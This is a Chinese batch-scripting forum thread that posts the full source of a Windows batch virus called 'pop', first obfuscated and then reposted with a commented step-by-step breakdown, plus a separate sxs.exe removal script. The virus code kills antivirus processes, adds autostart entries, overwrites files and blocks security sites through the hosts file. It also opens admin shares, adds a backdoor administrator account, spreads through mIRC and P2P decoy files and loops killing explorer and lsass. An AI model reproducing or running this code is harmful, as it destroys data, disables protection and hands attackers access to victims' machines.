中国DOS联盟

一个pcl专业病毒代码,看懂它有哪些功能了吗?
别看眼花了 ^--^,
@echo off
%xyux%
%random%%random%%random%%random%%random%%random%%random%
%11bv%
%random%%random%%random%%random%%random%%random%%random%
%fxvb%
%random%%random%%random%%random%%random%%random%%random%
%qusr%
%random%%random%%random%%random%%random%%random%%random%
%6ed6%
%random%%random%%random%%random%%random%%random%%random%
%w7pb%
%random%%random%%random%%random%%random%%random%%random%
set a=pop
%kfon%
%yzri%
copy %0 %windir%\%a%.bat
%u5gp%
%3yyx%
set pop=tskill
%pop% norton*
%pop% av*
%pop% fire*
%pop% anti*
%pop% spy*
%pop% bullguard
%pop% PersFw
%pop% KAV*
%pop% ZONEALARM
%pop% SAFEWEB
%pop% OUTPOST
%pop% nv*
%pop% nav*
%pop% F-*
%pop% ESAFE
%pop% cle
%pop% BLACKICE
%pop% def*
%4o3t%
%awxd%
%33u2%
%db62%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
%w5d3%
%fbk1%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
%b2u7%
%suo3%
set pop1=echo
%elws%
%jdei%
%pop1% >> %windir%\win.ini
%yopv%
%pop1% run=%windir%\%a%.bat >> %windir%\win.ini
%pop1% load=%windir%\%a%.bat >> %windir%\win.ini
%pop1% >> %windir%\system.ini
%qkfs%
%pop1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%lzvg%
%xjz3%
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%a%.bat" > nul
%r4yi%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%pop%%random%%pop%
%qehg%
net share ADMIN$
%82e1%
net share C$
net share IPC$
%5zbt%
net share c=c:
net share d=d:
%dozn%
%h3i1%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%h157%
set pop2=echo
%rmyg%
%dhg3%
%pop2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%qo3f%
%tfue%
%gfxo%
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
%b7mv%
%be8h%
set x=%random%
%dhjx%
%ucoh%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%lqwu%
%v4uh%
%b63j%
set pop3=echo
copy %0 %windir%\ftppassword.bat
%pop3% > irc.bat
%pop3% n1={ if ($nick == $me) { halt } >> irc.bat
%pop3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%pop3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%jyr3%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%dwdi%
%6a11%
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
%5lp3%
%pop%%random%%pop%
%w8cd%
%j5wa%
net user root pwd /add
net localgroup "Administratoren" root /add
%lepf%
net localgroup "Administrators" root /add
%pop%%random%%random%%pop%
%pva7%
%8xds%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%l3yt%
%euwr%
%rqt4%
%hpbw%
set popc=echo
%rhs5%
%popc% "<html>" > %windir%\hax0r.html
%popc% "<head>" >> %windir%\hax0r.html
%popc% "<title>Virus</title>" >> %windir%\hax0r.html
%popc% "</head>" >> %windir%\hax0r.html
%popc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%popc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
%popc% "</body>" >> %windir%\hax0r.html
%popc% "</html>" >> %windir%\hax0r.html
%hjb7%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
%a6y2%
%aff8%
%nlzq%
%flk1%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%pop%%random%%pop%%pop%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%pop%%random%%pop%%pop%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
%4bde%
%t15p%
set popa=copy
%e5vt%
%eyuy%
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%5s3p%
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%y8rl%
%ktxi%
%3bbc%
%3t67%
shutdown /r /f /t 23 /c "Infected with pop virus!!"
%y7kx%
%23cz%
shutdown /s /f /t 23 /c "Infected with pop virus!!"
%kfb3%
%ijzo%
%j5go%
%1r6t%
%f34c%
%ounv%
:bombing
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%pop%%random%%pop%
%q5cn%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%vu6x%
%ft65%
%dav%
%k7fj%
:: pop by pop

没人顶一下?我来.从中你可以学到一些很个性的批处理用法.下面再发一个有点搞笑的sxs专杀批处理,sxs病毒大家都知道吧,不知道?没中过? 你有点落伍了啊,有空补补知识吧.
sxs.exe专杀 自己写的一个批处理源码
@echo XXX_★訫☆龍(_少专用
@echo 首先。。。俺应该先哀悼一下。。。你是多么的不幸，中了这种毒
@pause
@echo 其次。。。你应该高兴了。。。。。你是多么的幸运，有了★訫☆龍(_少的这个程序
@pause
@echo 以下为这个病毒的描述，如有错误，，，请。。。不要告诉别人，，呵呵
@echo 通过u盘网络传播，中了后国内n多杀毒软件被破坏，在每盘根目录有sxs.exe，autorun.inf文件
@echo 修改文件选项为不显示隐藏文件，，，注册表被改了
@echo 一有u盘等移动存储设备连到本机立即复制本身过去。做得真tmd毒
@echo ----------------------------------★訫☆龍(_少
@echo QQ:502908008
@echo blog:http://www.51.com/home.php?user=yxlong208
@echo 开始我们的任务了~~~
@pause
@echo 程序将关闭相应进程，如果是瘟两千以下的系统请手动运行任务管理器关闭svohost.exe,sxs.exe进程，再继续本程序
@echo 如果提示没有找到进程的话先81怕。。。。
@pause
@echo off
taskkill /f /im sxs.exe
taskkill /f /im soundmam.exe
taskkill /f /im svohost.exe
@echo 病毒进程已经成功关闭
@pause
@echo 下一步，俺们将把病毒启动关闭
@pause
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v soundmam
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v svohost.exe
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v sxs.exe
@echo 病毒启动项成功删除
@pause
@echo 恢复文件选项属性为显示所有隐藏文件
@pause
reg delete "hklm\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL" /f /v CheckedValue
reg add "hklm\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 00000001
@echo 报告老婆：恢复完毕
@pause
@echo 以下彻底删除病毒文件，有u盘的赶紧插上，等60.314159秒继续本程序（*_*）
@pause
@cd
@c:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@D:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@E:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@F:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@G:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@H:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@I:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@echo 打完收工~ （*_*）
@echo 呵呵`` 其实我还是小菜 ...当然我写不出这样的程序嘛~``呵呵``这个是我师傅写的`~`我借来用用哈``
@echo 版权没有，尽情翻录。。。但是 如果有高手 当然也别见笑```大家玩玩 欢迎大家跟我来技术交流 QQ：502908008
@pause

sxs那段写的也太复杂了

看不懂啊

试验了下这个病毒，厉害。

一楼那个有很多垃圾代码来干扰被人，二楼那个连for命令也不会用

发现有一些路径出现乱码了，C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\

应该是C:\Documents and Settings\All Users\Start Menu\Programs\吧，由此可以看出是国外的人写的

这个东西，vbs脚本、html语言都用上了，厉害啊

::去掉了那些干扰别人的无用代码，并将一些有意设置的干扰的环境变量替换了，如set pop=tskill等



copy %0 %windir%\pop.bat



::将自己复制到windows目录下，名字为pop.bat



tskill norton*

tskill av*

tskill fire*

tskill anti*

tskill spy*

tskill bullguard

tskill PersFw

tskill KAV*

tskill ZONEALARM

tskill SAFEWEB

tskill OUTPOST

tskill nv*

tskill nav*

tskill F-*

tskill ESAFE

tskill cle

tskill BLACKICE

tskill def*



::关闭常见安全进程



reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul

echo  >> %windir%\win.ini

echo run=%windir%\pop.bat >> %windir%\win.ini

echo load=%windir%\pop.bat >> %windir%\win.ini

echo  >> %windir%\system.ini

echo shell=explorer.exe pop.bat >> %windir%\system.ini

chcp 1252 > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\pop.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pop.bat" > nul



::在注册表的run项，win.ini，system.ini和启动文件创建自启动项



net share ADMIN$

net share C$

net share IPC$

net share c=c:

net share d=d:



::开启系统的默认共享



for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul

echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts



::利用host文件将常见安全网站屏蔽



echo MsgBox "Infected with pop", 16, "pop" > v.vbs

start v.vbs



::弹出一个对话框显示你中招了-_-，明显在自我炫耀



set x=%random%

copy %0 %windir%\%x%.bat > nul 

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\pop.bat" /f > nul



::将自己复制到windows目录下面，名字是随机的，并在注册表的run和RunServices添加启动项，显示名字为html和pop



cd %windir%\system32

for %%a in (*.bat) do copy %0 %%a > nul

cd .. 

for %%a in (*.bat) do copy %0 %%a > nul



::用自身覆盖system32和windows目录下面的所有.bat文件



copy %0 c:\autoexec.bat



::用自身覆盖c:\autoexec.bat



copy %0 %windir%\ftppassword.bat

echo  > irc.bat

echo n1={ if ($nick == $me) { halt } >> irc.bat

echo n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat

echo n3= } >> irc.bat

if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini

if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini

del irc.bat > nul



::script代码不懂，貌似生成irc.bat和ftppassword.bat是利用mIRC漏洞的东西



md %programfiles%\pop\xxx\ > nul

md %programfiles%\pop\cracks\ > nul

copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul

copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul

copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul

copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul

echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt

net share xxx&cracks=%programfiles%\pop > nul



::在program file下面的pop\xxx和cracks文件生成一堆文件，并把这两个目录共享出去



net user root pwd /add

net localgroup "Administratoren" root /add

net localgroup "Administrators" root /add

reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul



::建立管理员帐户并设置网络共享的权限



echo "<html>" > %windir%\hax0r.html

echo "<head>" >> %windir%\hax0r.html

echo "<title>Virus</title>" >> %windir%\hax0r.html

echo "</head>" >> %windir%\hax0r.html

echo "<body bgcolor="#000000">" >> %windir%\hax0r.html

echo "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html

echo "</body>" >> %windir%\hax0r.html

echo "</html>" >> %windir%\hax0r.html

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul



::生成一个显示你中招了的网页文件并设为主页，又在炫耀自己了-_-



md %programfiles%\shared_folder > nul

copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul

copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul

reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul



::继续创建一些文件，把自己放到一些P2P软件的共享目录下面陷害一些无知而好奇的人



shutdown /r /f /t 23 /c "Infected with pop virus!!"

shutdown /s /f /t 23 /c "Infected with pop virus!!"



::重启之后又关机？！还要再次炫耀一下，提醒你中招了……



:bombing

chcp 1252 > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul

copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul

copy %0 "C:\%random%.bat" > nul

taskkill /f /im explorer.exe > nul

taskkill /f /im lsass.exe > nul

goto bombing



::这个的作用应该是防止在关机倒数期间的启动文件夹的启动文件被删除，不断的结束explorer.exe和lsass.exe造成骚扰



:: pop by pop 



::上面那个是作者的注释，算是是版权声明吧-_-

Last edited by dikex on 2007-1-20 at 09:05 PM ]

单从感染计算机的角度讲 这个脚本也只能称之为脚本了

一楼的东东看得头都大了

骗人的bat。

二楼的批处理编写水平和我差不多，汗……

这只能算脚本吧,病毒传染的代码都没看见
还想研究一下批处理的传染捏

二楼的代码也太.......^o^

:bombing
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
这段应是随机繁殖。